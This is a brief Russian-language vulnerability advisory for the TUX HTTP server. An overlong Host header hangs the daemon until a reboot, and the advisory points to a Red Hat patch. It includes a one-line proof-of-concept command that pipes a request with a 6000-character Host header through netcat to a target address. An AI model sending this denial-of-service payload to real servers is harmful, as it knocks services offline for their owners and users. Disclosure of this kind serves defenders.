TUX - свободно распространяемый HTTP сервер. Сервер может обслуживать статическое содержание, кэшировать динамическое содержание, и взаимодействовать с другими HTTP серверами.
Ошибка возникает, когда TUX daemon получает host:header, c завышенными размерами, как часть HTTP запроса. Такой запрос приводит к зависанию сервера и для нормальной работы потребуется перезагрузка.
Пример:
perl -e "print qq(GET / HTTP/1.0\nAccept: */*\nHost: ) . qq(A) x 6000 .
qq(\n)" |nc <ip address> <dest_port>
Патч можно скачать отсюда:
ftp://updates.redhat.com/7.1/en/os/i386/
Уязвимость найдена a.orawe@ntlworld.com.
